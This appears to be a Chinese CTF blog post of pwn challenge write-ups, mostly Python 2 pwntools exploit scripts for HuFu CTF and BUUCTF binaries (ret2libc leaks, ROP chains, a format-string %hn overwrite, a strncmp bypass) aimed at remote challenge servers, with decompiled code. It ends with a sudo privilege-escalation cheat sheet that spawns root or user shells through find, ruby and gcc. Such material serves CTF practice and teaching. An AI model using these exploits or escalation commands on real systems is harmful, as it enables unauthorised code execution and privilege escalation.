不记得是什么时候打的比赛,自己搭的博客崩了,搬来csdn记录一下
虎符CTF 复现
0x01
任意地址写
# Python 2 pwntools script (print statements, string.atoi, str/bytes mixing) for the
# 虎符CTF challenge the author describes as an arbitrary-address write: the service
# reveals an address, then takes a target address and single bytes to store there.
from pwn import*
from sys import*
p=remote('39.97.210.182',10055)#p=remote()39.97.210.182 10055
#p=process("./chall")
elf=ELF('chall')
#libc = ELF('libc6_2.27-3ubuntu1_amd64.so')
#libc = ELF('./libc-2.23.so')
#libc = ELF('./libc.so.6')
context(os='linux',arch='amd64',log_level='debug')
p.recvuntil("I placed the target near: ")
cmd="cat flag>&0"  # unused: its only reference is the commented-out sendline at the bottom
add = p.recvuntil("\n")
# Parse the leaked hex address; string.atoi is Python 2 only (int(add, 16) in Python 3).
base=string.atoi(add,16)
base =base -0x0809c0  # leaked address minus its offset inside libc -> libc base (offset is author-supplied, libc-build specific)
one = base +0xf1147 # candidate offset added to base; other values the author tried: 0x4526a 0x45216 0x10a38c 0x4f2c5 0x4f322 (all libc-build specific)
pass_call = base +8341968# 8341968 == 0x7f49d0: the address the three bytes below are written to (libc-build specific)
print hex(pass_call)
pass_call = eval(str(pass_call))  # no-op round-trip of an int through eval; int(pass_call) would do the same
print "base:"+ hex(base)
print "one:"+hex(one)
print pass_call
p.recvuntil("shoot!\n")
p.sendline(str(pass_call))#+"cat flag >&0")   # target address, sent in decimal
# Store the low three bytes of `one` at pass_call, one byte per "biang!" prompt.
# p64(one)[i] is a 1-char str in Python 2 (it would be an int in Python 3).
p.sendlineafter("biang!\n",p64(one)[0]) # earlier attempts used 0x10a38c / 0x4f322 as the offset
p.sendlineafter("biang!\n",p64(one)[1]) #
#gdb.attach(p)
p.sendlineafter("biang!\n",p64(one)[2]) #
#p.recvuntil("bye~\n")
#p.sendline(cmd)
p.interactive()
本地通了,远程mmp,偏移不一样还是啥的。
堆块分配函数
size = sub_DC7();
if ( size > 0x100 && (unsigned int)size <= 0xFFF )   // accepted sizes: 0x101 .. 0xFFF
{
ptr[v2] = malloc(0x28uLL);                 // per-box metadata chunk
*((_QWORD *)ptr[v2] + 4) = size;           // metadata[4] = requested size
v0 = ptr[v2];
v0[3] = malloc(size); // metadata[3] = pointer to the newly allocated data chunk of `size` bytes
memset(ptr[v2], 0, 0x14uLL);
read_0x10_to_ptr(ptr[v2]);                 // name suggests it reads 0x10 user bytes into the metadata chunk -- confirm
puts("Key: ");
for ( j = 0; j <= 15; ++j )
printf("%02x ", *((unsigned __int8 *)ptr[v2] + j));// echoes the first 16 bytes of the metadata chunk (author: "prints fd and bk")
//
//
printf("\nBox ID: %d\n", v2);
}
buuctf 刷题缓解心痛心情
pwn1_sctf_2016
C++ 写的,害,输入 I 会转换为 you,所以有溢出啊,还有后面函数
# Python 2 pwntools script for pwn1_sctf_2016 (32-bit target, per p32() and the 0x0804xxxx addresses).
from pwn import *
from sys import *
debug=1
context.log_level='debug'
context.arch='amd64'  # NOTE(review): target looks 32-bit; harmless here since nothing is assembled
if debug:
    p=process("./pwn1_sctf_2016")
else:
    host = "node3.buuoj.cn"
    port = 28912
    p=remote(host, port)
door = 0x8048f0d  # where the overwritten return address goes (the extra function the author mentions)
# 20 "I" characters: the author notes the program expands each I to "you", which is what overflows the buffer.
pay =20*"I"+"aaaa"+p32(door)
gdb.attach(p,"b *0x80491DE")  # NOTE(review): runs even when debug=0 (remote tube); belongs inside the `if debug:` branch
p.sendline(pay)
p.interactive()
ciscn_2019_n_1 浮点数查看
# Python 2 pwntools script for ciscn_2019_n_1 (the author's note: a float value is checked).
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
    p=process("./ciscn_2019_n_1")
else:
    host = "node3.buuoj.cn"
    port =29648
    p=remote(host, port)
# 44 bytes of zero padding, then 0x41348000 -- the IEEE-754 single-precision
# bit pattern of 11.28125 -- written as a qword (its high dword is zero).
pay = p64(0)*4+p32(0)*3+p64(0x41348000)
#gdb.attach(p,"b *0x80491DE")
p.sendline(pay)
p.interactive()
ciscn_2019_c_1 泄露 打system 需要进行一个栈对齐,不能打onegadget
# Python 2 pwntools script for ciscn_2019_c_1: two-stage ret2libc.
# Stage 1 leaks puts()'s address through puts@plt and returns to main;
# stage 2 calls system("/bin/sh") using the libc base derived from the leak.
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
    p=process("./ciscn_2019_c_1")
else:
    host = "node3.buuoj.cn"
    port =25934
    p=remote(host, port)
pop_rdi_t=0x400c83   # pop rdi ; ret gadget (per its name; author-supplied)
put_got = 0x602020   # puts@got
put_plt = 0x4006E0   # puts@plt
main= 0x400B28
# 0x58 bytes of padding up to the saved return address, then puts(puts@got) and back to main.
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
# Read up to the 0x7f high byte of the leaked pointer; zero-extend the last 6 bytes to a qword.
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
base = put_add-0x0809c0   # puts() offset in the remote libc (author-supplied, libc-build specific)
one = base + 0x4526a  # unused; one-gadget candidates tried: 0xf1147 0x45216 0x4526a 0xf02a4 -- the author notes a one-gadget does not work here
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a   # presumably the "/bin/sh" string in libc (earlier value: 0x18cd57)
system = base + 0x04f440  # system() in libc (earlier value: 0x045390)
ret = 0x4006b9 # bare `ret` gadget: on Ubuntu 18 system() needs a 16-byte-aligned stack, so one extra ret realigns it
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
p.interactive()
babyrop
这个题的关键在于绕过 strncmp:strlen 函数遇到‘\0’截断,但 read 函数遇到‘\n’才截断;然后 read 函数有一个溢出可以把 v5 覆盖掉,v5 返回到 main 函数后,可以控制另一个函数溢出。
nt __cdecl sub_804871F(int a1)   // decompiler output; "nt" is "int" truncated in the paste
{
size_t v1; // eax
char s; // [esp+Ch] [ebp-4Ch]
char buf[7]; // [esp+2Ch] [ebp-2Ch]
unsigned __int8 v5; // [esp+33h] [ebp-25h]  -- 7 bytes after buf, i.e. inside the 0x20-byte read() window
ssize_t v6; // [esp+4Ch] [ebp-Ch]
memset(&s, 0, 0x20u);
memset(buf, 0, 0x20u);
sprintf(&s, "%ld", a1);
v6 = read(0, buf, 0x20u); // reads up to 0x20 bytes into a 7-byte buffer: the bytes past buf overwrite v5
buf[v6 - 1] = 0; // strips the trailing newline; v6 == 0 (EOF) would index buf[-1]
v1 = strlen(buf); // a leading NUL makes this 0 ...
if ( strncmp(buf, &s, v1) ) // ... so strncmp compares 0 bytes and always reports equal
exit(0);
write(1, "Correct\n", 8u);
return v5; // the overwritten byte is handed back to the caller  (closing brace lost in the paste)
ssize_t __cdecl sub_80487D0(char a1) 这个a1 就是返回的V5了
{
ssize_t result; // eax
char buf; // [esp+11h] [ebp-E7h]  -- 0xE7 bytes below the saved ebp
if ( a1 == '' )   // the character literal was lost in the paste -- TODO confirm the original value
result = read(0, &buf, 0xC8u);
else
result = read(0, &buf, a1); // caller-controlled length (the v5 byte returned by sub_804871F) into a 1-byte buffer
return result;
}
比较操蛋的是远程的 lib 库,一定要远程去查。
# Python 2 pwntools script for babyrop (32-bit target: p32/u32 and 0x0804xxxx addresses).
# Stage 1: pass the strncmp check and set the length the second read() will use;
# stage 2: leak puts() through the overflow, return to main, then call system("/bin/sh").
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'  # NOTE(review): target is 32-bit; harmless since nothing is assembled here
if debug:
    p=process("./babyrop")
else:
    host = "node3.buuoj.cn"
    port =27828
    p=remote(host, port)
libc = ELF('./libc6_2.23-0ubuntu10_i386.so') # author's note: this is NOT the remote libc, don't use it -- the offsets below are hard-coded instead
#gdb.attach(p)
put_plt = 0x8048548
put_got = 0x8049FD4
main = 0x8048825
# Leading NUL makes strlen(buf) == 0 so strncmp compares nothing; the 0xff bytes reach
# the byte the function returns (v5), which becomes the next read()'s length.
pay = "\x00"+"\xff"*8
p.sendline(pay)
p.recvuntil("Correct\n")
# 0xe7 bytes up to the saved ebp, 4 for ebp, then puts(puts@got) returning to main.
pay = 0xe7 *"a"+ "aaaa"+p32(put_plt)+p32(main)+p32(put_got)
p.sendline(pay)
# Take the 4 bytes ending in 0xf7 (high byte of a 32-bit libc pointer).
put_add =u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
base = put_add -0x05f140# puts() offset in the remote libc; leftovers: libc.symbols["puts"], 0x05fca0
print "put:"+hex(put_add)
print "base:"+hex(base)
pay = "\x00"+"\xff"*8   # same check bypass again after returning to main
p.sendline(pay)
str_bin = base +0x15902b# "/bin/sh" in the remote libc; leftovers: libc.search("/bin/sh").next(), 0x15ba0b
system = base + 0x03a940# system() in the remote libc; leftovers: libc.symbols["system"], 0x03ada0
one = base+0x5fbc6# unused one-gadget candidates: 0x5fbc5 0x3ac69 0x3ac62 0x3ac5e 0x3ac5c
pay = 0xe7 *"a"+ "aaaa"+p32(system)+p32(0xbeeefff)+p32(str_bin)  # system("/bin/sh") with a dummy return address
#pay = 0xe7 *"a"+ "aaaa"+p32(one)
p.sendline(pay)
#input()
p.interactive()
网速慢真的是会让人上火 ,tnnnnnnnnnnd,f*********
ciscn_2019_en_2 和ciscn_2019_c_1 一模一样
# Python 2 pwntools script for ciscn_2019_en_2; the author notes it is identical to ciscn_2019_c_1.
# Stage 1 leaks puts()'s address through puts@plt and returns to main;
# stage 2 calls system("/bin/sh") using the libc base derived from the leak.
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
    p=process("./ciscn_2019_en_2")
else:
    host = "node3.buuoj.cn"
    port =27611
    p=remote(host, port)
pop_rdi_t=0x400c83   # pop rdi ; ret gadget (per its name; author-supplied)
put_got = 0x602020   # puts@got
put_plt = 0x4006E0   # puts@plt
main= 0x400B28
# 0x58 bytes of padding up to the saved return address, then puts(puts@got) and back to main.
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
# Read up to the 0x7f high byte of the leaked pointer; zero-extend the last 6 bytes to a qword.
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
base = put_add-0x0809c0   # puts() offset in the remote libc (author-supplied, libc-build specific)
one = base + 0x10a38c  # only used by the commented-out chain below; candidates tried: 0x4f322 0x4f2c5 0x4526a 0xf1147 0x45216 0xf02a4
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a   # presumably the "/bin/sh" string in libc (earlier value: 0x18cd57)
system = base + 0x04f440  # system() in libc (earlier value: 0x045390)
ret = 0x4006b9 # bare `ret` gadget for stack alignment on Ubuntu 18 (system() expects a 16-byte-aligned stack)
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
#pay = "a"*0x58 +p64(ret)+ p64(one)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
p.interactive()
溜了溜了,该玩耍去了
get_started_3dsctf_2016
溢出,后面函数,需要注意的是参数要传对,才能执行后门函数
void __cdecl get_flag(int a1, int a2)
{
int v2; // eax
int v3; // esi
unsigned __int8 v4; // al
int v5; // ecx
unsigned __int8 v6; // al
if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) // both arguments must equal these constants, otherwise nothing happens
{
v2 = fopen("flag.txt", "rt");
v3 = v2;
v4 = getc(v2);   // NOTE: a NULL from fopen() is not checked before getc()
if ( v4 != '\xFF' )   // EOF test (-1 truncated to 0xFF); a real 0xFF byte in the file would also stop here
{
v5 = (char)v4;
do
{
putchar(v5);
v6 = getc(v3);
v5 = (char)v6;
}
while ( v6 != 255 );  // same EOF test as above
}
fclose(v3);
}
}
#!/usr/bin/env python2
# execve generated by ROPgadget  -- leftover template header; the chain below is a hand-built call to get_flag, not an execve chain
# Python 2 pwntools script for get_started_3dsctf_2016 (32-bit). get_flag(a1, a2) only opens
# flag.txt when a1 == 0x308CD64F and a2 == 0x195719D1, so both arguments are placed on the stack.
from pwn import *
from sys import *
from struct import pack  # unused
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
    o=process("./get")
    gdb.attach(o,"b *0x8048A3B")
else:
    host = "node3.buuoj.cn"
    port =26456
    o=remote(host, port)
ret = 0x8048A40   # first return target (a plain `ret` gadget by its name -- TODO confirm)
flag = 0x80489A0  # presumably get_flag's address
# 56 bytes of padding, ret, get_flag, then get_flag's own return address
# (0x804e6a0 -- not named on the page; verify) followed by its two arguments.
p = 'a'* 56+p32(ret)+p32(flag)+p32(0x804e6a0)+p32(0x308CD64F)+p32(0x195719D1)
o.sendline(p)
o.interactive()
[第五空间2019 决赛]PWN5
绕过if 条件,格式化字符串可写,修改unk_804C044内容即可
srand(v1);
fd = open("/dev/urandom", 0);
read(fd, &unk_804C044, 4u);   // 4 random bytes become the expected password
printf("your name:");
read(0, &buf, 0x63u);
printf("Hello,");
printf(&buf);   // format-string bug: user input is the format argument; printf("%s", buf) would close it
printf("your passwd:");
read(0, &nptr, 0xFu);
if ( atoi(&nptr) == unk_804C044 )   // the author's approach: overwrite unk_804C044 via the format string so a known value matches
{
puts("ok!!");
system("/bin/sh");
}
这道题可以收获的是32位格式化写的时候,payload的构造
p32(add1)+p32(add2)+p32(add3)+"%10$hn%11$hn%12$hn" #hn是双字节写
如果是特定字符写的话,就要巧妙的构造了,比如
p32(add)+"%"+str(xxxxx)+"c%xx$hn"
p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写
#!/usr/bin/env python2
# execve generated by ROPgadget  -- leftover template header; this is a format-string write, not a ROP chain
# Python 2 pwntools script for [第五空间2019 决赛]PWN5: printf(&buf) with user-controlled buf
# lets two %hn writes set unk_804C044 to a known value, which is then sent as the password.
from pwn import *
from sys import *
from struct import pack  # unused
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
    o=process("./pwn5")
    gdb.attach(o,"b *0x080492A6")
else:
    host = "node3.buuoj.cn"
    port =28330
    o=remote(host, port)
# The two addresses are the first 8 bytes of the format string (stack args 10 and 11).
# Each %hn stores the number of characters printed so far -- 8 -- as a 16-bit write,
# so the dword at 0x804C044 becomes 0x00080008.
pay = p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" # hn = 2-byte write
o.sendlineafter("your name:",pay)
pa = p32(0x80008)  # unused; 0x80008 == 524296 is the value written above
o.sendlineafter("your passwd:","524296")  # atoi("524296") == 0x80008, the value now at unk_804C044
o.interactive()
提权
使用 GTFOBins 查找提权命令,网址为:https://gtfobins.github.io/
查看系统用户信息:
cat /etc/passwd|grep /bin/bash
sudo -l 查看特权
find命令提权,hackNos-boat是用户名:
sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \; -quit
ruby 命令提权,hunter 是用户名:
sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'
gcc 提权到root:
sudo /usr/bin/gcc -wrapper /bin/bash,-s .